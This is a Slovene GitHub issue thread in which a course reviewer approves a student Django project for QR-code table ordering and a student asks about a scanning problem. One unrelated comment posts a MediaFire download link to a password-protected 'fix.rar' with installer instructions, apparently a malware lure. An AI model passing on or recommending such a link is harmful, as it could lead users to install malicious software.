### ISSUE TITLE
Oddaja projekta

### ISSUE THREAD

**Issue by gasperxy** [gzmazek/skeniraj-in-naroci#1]
Za oddajo projekta bi bilo treba odpret issue, zato sem ga jaz namesto vaju :)

Projekt sem pognal lokalno (glede na naš pogovor preko emaila ima binder neke težave). 
Sama aplikacija je narejena zelo lepo in načeloma deluje super, čeprav nisem mogel poskenirat neke qr kode, da bi videl še kako to deluje.

Tudi če delata v Django, je dobr priti zadevi do "dna" kako jo pognati v Binderju (čeprav to mogoče ni poudarek pri tem predmetu). Ideja Binderja je, da se narejeno aplikacijo naučite še pognati v drugem (ne lokalnem) okolju.

Projekt vseeno potrjujem @jaanos

**Comment by mengyanshou** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by vitolev** [comment]
@gasperxy hvala za komentar. Bova poskusila priti zadevi do dna kako usposobiti Binder.

A bi lahko bolj natančno opisali problem skeniranja QR kode? Možno da je kakšen bug. Jaz sem sicer pri sebi še enkrat sprobal in mi je delalo. QR koda ki se generira pri vsaki mizi je mišljeno da jo uporabnik poskenira znotraj aplikacije (na prvi strani je gumb Scan QR code). Seveda mora biti uporabnik za ta namen prijavljen v aplikacijo. Da preverite funkcijonalnost vam predlagam, da QR kodo ki se generira najprej slikate s telefonom in nato sliko poskenirate.

**Comment by vitolev** [comment]
@gasperxy hvala za komentar. Bova poskusila priti zadevi do dna kako usposobiti Binder.

A bi lahko bolj natančno opisali problem skeniranja QR kode? Možno da je kakšen bug. Jaz sem sicer pri sebi še enkrat sprobal in mi je delalo. QR koda ki se generira pri vsaki mizi je mišljeno da jo uporabnik poskenira znotraj aplikacije (na prvi strani je gumb Scan QR code). Seveda mora biti uporabnik za ta namen prijavljen v aplikacijo. Da preverite funkcijonalnost vam predlagam, da QR kodo ki se generira najprej slikate s telefonom in nato sliko poskenirate.
